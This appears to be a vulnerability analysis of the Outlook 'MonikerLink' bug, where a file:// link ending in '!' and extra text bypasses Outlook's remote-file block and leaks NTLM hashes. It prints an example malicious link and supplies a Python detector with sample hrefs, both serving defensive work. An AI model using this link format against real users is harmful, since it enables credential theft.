Full Report
Outlook is the most popular email client in the world, and the rest of the Microsoft Office suite is just as important, so vulnerabilities in these products can have devastating consequences. Everyone knows the common URL schemes such as http and https. There are, however, many other URL schemes registered for other applications, such as Skype. The file:// URL references local files on the system. By default, Word blocks such a link from executing when it is clicked. Some researchers found a strange bypass of this check: if the path contains an exclamation point followed by some text, the check is skipped. For example: file:///\\10.10.111.111\test\test.rtf!something. The exclamation point has a special meaning in Outlook that changes how the path is parsed, from a file reference into a Moniker used to look up COM objects. What is the impact? First, a request for a file at a remote location would leak the NTLM hash. Second, because the item is parsed as a COM object, it may be possible to escalate this to RCE. However, there is no real example of this, and it feels like a scare tactic. Overall this is a fairly simple mishap in URL parsing; with deep knowledge of a system, such obvious bugs reveal themselves.
Analysis Summary
# Vulnerability: Outlook URL Parsing Bypass via Exclamation Mark Leading to File Access/Credential Leak
## CVE Details
- CVE ID: Not specified in the provided text.
- CVSS Score: Not specified in the provided text.
- CWE: (Inferred) CWE-77: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') or related URL parsing weakness.
## Affected Systems
- Products: Microsoft Outlook. Also potentially other software that handles URL parsing similarly.
- Versions: Not specified in the provided text. The vulnerability exists in default desktop Outlook configurations where `file://` URLs are typically blocked from remote access.
- Configurations: Occurs when clicking on specially crafted hyperlinks inside Outlook emails.
## Vulnerability Description
This vulnerability resides in how Microsoft Outlook parses certain `file://` URLs. By default, clicking a `file://` link that points to a remote resource (e.g., a file share) is blocked or triggers a warning, which prevents credential leakage via SMB. However, if the URL path includes an exclamation mark (`!`) followed by any text (e.g., `file:///\\10.10.111.111\test\test.rtf!something`), this special character bypasses the security check designed to block remote file access. The bypass causes Outlook's parser to interpret the URI differently, treating the path as a Moniker used to locate COM objects, which unexpectedly allows access to the specified remote resource.
## Exploitation
- Status: PoC available (The description details the creation of the malicious link).
- Complexity: Low (Requires crafting a specific URL format in an email).
- Attack Vector: Network (Delivered via email, triggers remote connection/access upon clicking).
## Impact
- Confidentiality: High (Successful access to a remote file path leaks the user's NTLM hash when the SMB connection is initiated).
- Integrity: Potential (The mechanism relies on parsing as a COM object, which raises the *possibility* of exploitation leading to Remote Code Execution (RCE), though the article notes this RCE aspect is speculative or unproven in this context).
- Availability: Low/Negligible (Direct impact not clearly described, likely linked to potential RCE if realized).
## Remediation
### Patches
- No specific patch details or version numbers were provided in the analysis summary. Users must consult official Microsoft security bulletins for updates related to URL handling in Outlook.
### Workarounds
- Disable the viewing of embedded HTML content, and avoid clicking suspicious links, especially those using the `file://` scheme together with an exclamation mark.
- Security monitoring for outbound SMB/NetNTLM traffic initiated by Outlook processes.
## Detection
- **Indicators of compromise:** Outbound network connections initiated by the Outlook process (or related components) to remote IP addresses over protocols like SMB/Port 445, especially immediately following a user clicking a hyperlink.
- **Detection methods and tools:** Network monitoring tools configured to alert on unexpected SMB authentication negotiation attempts originating from user workstations directed at external or untrusted internal hosts.
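The link shape described above (a remote `file://` path carrying `!` plus trailing text) and the detection idea of tying such links to SMB egress can be turned into a simple mail-hygiene check. The following is an added example written for this summary, not code from Check Point Research or Microsoft; the `SAMPLE_HREFS` list is constructed and the function names are hypothetical.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample hyperlinks, shaped like href values pulled from an HTML
# email body; the hosts are placeholders, not real targets.
SAMPLE_HREFS = [
    "https://example.com/invoice.pdf",
    r"file:///\\10.10.111.111\test\test.rtf!something",
    r"file:///\\10.10.111.111\test\test.rtf",
    r"file://fileserver/share/report.docx!x",
    r"file:///C:\Users\Public\notes.txt",
    r"file://localhost/C:/temp/a.txt!b",
]

_FILE_SCHEME = re.compile(r"^file:", re.IGNORECASE)
_DRIVE = re.compile(r"^[A-Za-z]:$")

def split_file_link(href: str) -> Optional[Tuple[str, str]]:
    """Split a file:// link into (host, path); host is '' for a local path.
    Returns None when the link does not use the file scheme. Both the
    file://host/share form and the UNC form with backslashes are accepted,
    since Windows treats forward slash and backslash alike here."""
    if not _FILE_SCHEME.match(href):
        return None
    rest = href.split(":", 1)[1].replace("\\", "/").lstrip("/")
    host, _, path = rest.partition("/")
    if not host or host.lower() == "localhost" or _DRIVE.match(host):
        host = ""
    return host, path

def is_monikerlink_style(href: str) -> bool:
    """True when a file:// link names a remote host and the path carries '!'
    followed by further text: the shape the report says slips past Outlook's
    remote file:// block and is parsed as a Moniker instead of a file."""
    parts = split_file_link(href)
    if parts is None or not parts[0]:
        return False
    bang = parts[1].rfind("!")
    return bang != -1 and bang < len(parts[1]) - 1

def scan_hrefs(hrefs: List[str]) -> List[Tuple[str, str]]:
    """Return (href, host) for every link worth blocking or alerting on; the
    hosts can be matched against SMB/445 egress from the Outlook process."""
    return [(h, split_file_link(h)[0]) for h in hrefs if is_monikerlink_style(h)]

if __name__ == "__main__":
    for href, host in scan_hrefs(SAMPLE_HREFS):
        print(f"flag: {href}  ->  expect SMB egress to {host}")
```

Local paths and plain remote `file://` links without the `!` suffix are left alone, so the check only surfaces the bypass shape rather than every file link in a message.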
## References
- Vendor advisories: Not specified in the summary, but research originates from Check Point Research (CPR).
- Relevant links - defanged:
* `hXXps://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/`
* Reference to prior research paper: `hXXps://research.checkpoint.com/2023/the-obvious-the-normal-and-the-advanced-a-comprehensive-analysis-of-outlook-attack-vectors/`